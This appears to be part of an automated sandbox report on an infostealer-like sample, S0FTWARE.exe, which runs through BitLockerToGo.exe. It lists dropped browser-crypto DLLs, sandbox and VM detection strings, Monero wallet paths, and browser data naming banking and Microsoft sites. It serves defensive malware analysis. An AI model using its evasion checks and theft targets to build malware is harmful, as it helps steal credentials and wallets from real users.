                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                          Source: Google Drive.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: YouTube.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Sheets.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Gmail.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Slides.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Docs.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: S0FTWARE.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: S0FTWARE.exeStatic file information: File size 5526528 > 1048576
                          Source: S0FTWARE.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x24c800
                          Source: S0FTWARE.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x26fa00
                          Source: S0FTWARE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: freebl3.pdb source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: BitLockerToGo.pdb source: S0FTWARE.exe, 00000000.00000002.1628010774.00000000114A2000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.2692003466.00000000337C3000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.2686848782.00000000278ED000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp, mozglue.dll.3.dr
                          Source: Binary string: BitLockerToGo.pdbGCTL source: S0FTWARE.exe, 00000000.00000002.1628010774.00000000114A2000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FA132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_008FA132
                          Source: S0FTWARE.exeStatic PE information: section name: .symtab
                          Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                          Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_009109C2 push ecx; ret 3_2_009109D5
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_009045B9 push esi; ret 3_2_009045BB
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FF635 push ecx; ret 3_2_008FF648
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9AB536 push ecx; ret 3_2_6C9AB549
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                          Boot Survival

                          barindex
                          Monitors registry run keys for changes
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FA132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_008FA132
                          Source: C:\Users\user\Desktop\S0FTWARE.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: 3.2.BitLockerToGo.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: BitLockerToGo.exeBinary or memory string: DIR_WATCH.DLL
                          Source: BitLockerToGo.exeBinary or memory string: SBIEDLL.DLL
                          Source: BitLockerToGo.exeBinary or memory string: API_LOG.DLL
                          Source: BitLockerToGo.exe, 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL11:08:1811:08:1811:08:1811:08:1811:08:1811:08:18DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_008E17FD
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI coverage: 9.8 %
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeLast function: Thread delayed
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F2A37 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 008F2B4Ah3_2_008F2A37
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EA941 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EA941
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F7178 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_008F7178
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F6A05 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_008F6A05
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EE5B9 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EE5B9
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EC528 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_008EC528
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F7D20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008F7D20
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E1D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008E1D70
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008ECE96 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_008ECE96
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EC888 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EC888
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F785A GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_008F785A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F8D90 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscmp,_mbscmp,_mbscmp,_splitpath,_ismbcupper,wsprintfA,SHFileOperation,FindNextFileA,FindClose,3_2_008F8D90
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EDD2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_008EDD2A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F6E7F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_008F6E7F
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F2C16 GetSystemInfo,wsprintfA,3_2_008F2C16
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: Web Data.13.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: discord.comVMware20,11696494690f
                          Source: Web Data.13.drBinary or memory string: AMC password management pageVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: outlook.office.comVMware20,11696494690s
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.00000000030F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh&
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                          Source: Web Data.13.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                          Source: Web Data.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                          Source: Web Data.13.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.00000000030F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarejvp
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.0000000003159000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: msedge.exe, 0000000B.00000003.2231002220.00006FE800324000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                          Source: Web Data.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                          Source: Web Data.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                          Source: Web Data.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                          Source: Web Data.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                          Source: S0FTWARE.exe, 00000000.00000002.1623430445.0000000000757000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2305442683.0000028845644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                          Source: Web Data.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                          Source: Web Data.13.drBinary or memory string: tasks.office.comVMware20,11696494690o
                          Source: Web Data.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: dev.azure.comVMware20,11696494690j
                          Source: Web Data.13.drBinary or memory string: global block list test formVMware20,11696494690
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.00000000030F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: Web Data.13.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                          Source: Web Data.13.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                          Source: Web Data.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
